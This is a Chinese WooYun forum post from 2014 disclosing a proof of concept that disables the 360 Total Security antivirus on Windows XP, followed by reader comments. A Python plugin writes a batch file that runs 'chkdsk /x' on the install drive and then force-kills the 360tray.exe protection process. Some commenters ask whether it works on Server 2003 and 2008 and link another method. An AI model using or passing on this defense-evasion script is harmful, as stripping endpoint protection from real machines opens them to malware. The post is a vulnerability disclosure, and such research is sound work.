360安全卫士chkdsk taskkill主进程 POC

  • A+
所属分类:WooYun-Zone

Author:        雷蜂

测试使用Windows XP SP3,VMware Workstation 10.0.3。

经测试,如果360安全卫士(其实不止360一家)安装在非系统盘(360自身默认安装在非系统盘),

然后对其所在盘符进行chkdsk /x 操作,其主防进程360tray.exe会自动强行退出,从而完全失去保护能力。

#!/usr/bin/env python

# coding=utf-8

“””

Site:

Framework:

“””

from baseframe import BaseFrame

class MyPoc(BaseFrame):

    poc_info = {

        # poc相关信息

        ‘poc’: {

            ‘id’: ‘poc-2014-0152′,

            ‘name’: ’360安全卫士安装非默认路径 chkdsk taskkill主进程 POC’,

            ‘author’: ‘雷蜂’,

            ‘create_date’: ’2014-11-19′,

        },

        # 协议相关信息

        ‘protocol’: {

            ‘name’: ‘local’,

            ‘port’: [0],

            ‘layer3_protocol’: [],

        },

        # 漏洞相关信息

        ‘vul’: {

            ‘app_name’: ’360′,

            ‘vul_version’: ['*'],

            ‘type’: ‘Other’,

            ‘tag’: ['本地提权', '杀掉360主进程', 'chkdsk taskkill', '360漏洞'],

            ‘desc’: ”’

                    Wooyun Author zhuixing:

                    测试使用Windows XP SP3,VMware Workstation 10.0.3。

                    经测试,如果360安全卫士(其实不止360一家)安装在非系统盘(360自身默认安装在非系统盘),

                    然后对其所在盘符进行chkdsk /x 操作,其主防进程360tray.exe会自动强行退出,从而完全失去保护能力。

                    ”’,

            ‘references’: [‘http://wooyun.org/bugs/wooyun-2014-078641′,

            ],

        },

    }

    @classmethod

    def verify(cls, args):

        verify_url = args['options']['target']

        payload = ”’

@echo off

chkdsk /x e:

taskkill /F /IM 360tray.exe /T

”’

        # write

        test_bat = open(‘./360-taskkill.bat’, ‘w’)

        test_bat.write(payload)

        test_bat.close()

        args['success'] = True

        args['poc_ret']['vul_url'] = ‘Generation ok, file: ./360-taskkill.bat’

        return args

    exploit = verify

if __name__ == ‘__main__’:

    from pprint import pprint

    mp = MyPoc()

    pprint(mp.run())

  1. 1#

    有点小鸡冻 | 2014-11-25 20:02

    有道理,采集了!以加入豪华午餐

  2. 2#

    Ev1l | 2014-11-25 20:54

    另研究了一种system的办法 http://alidoubi.com/93.html

  3. 3#

    Anymous (ด้้้้้็็็็็้้้้้็็็็็้้้ส็็็็็็็็็็็็็็็็็็็็็็็ด้้้้้็็็็็้้้้้็็็็็้้้‮)ส้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้้ด้้้้้็็็็็้้้้้็็็็็้้้)) | 2014-11-25 20:55

    其他系统测试了吗

  4. 4#

    雷锋 (做好事,不留名。享年23岁) | 2014-11-25 22:18

  5. 5#

    Knight (查水表。缴wb不杀) | 2014-11-26 00:06

    需要需要管理员权限,而且卸载卷这事基本就没有软件能抗住吧。

  6. 6#

    C4ndy (打酱油。。) | 2014-11-26 00:09

    @Ev1l 然后直接taskkill /PID [PID] /F    这样方法好像不可以kill 2k8

  7. 7#

    Ev1l | 2014-11-26 19:21

    @C4ndy 嗯,但是2k3基本可以秒杀所有安全软件

  8. 8#

    ztaosony | 2014-11-26 19:56

    这个方法略屌

  9. 9#

    糖剩七颗 (退潮后才发现自己原来一直在裸泳) | 2014-11-26 20:06

    2k8有效吗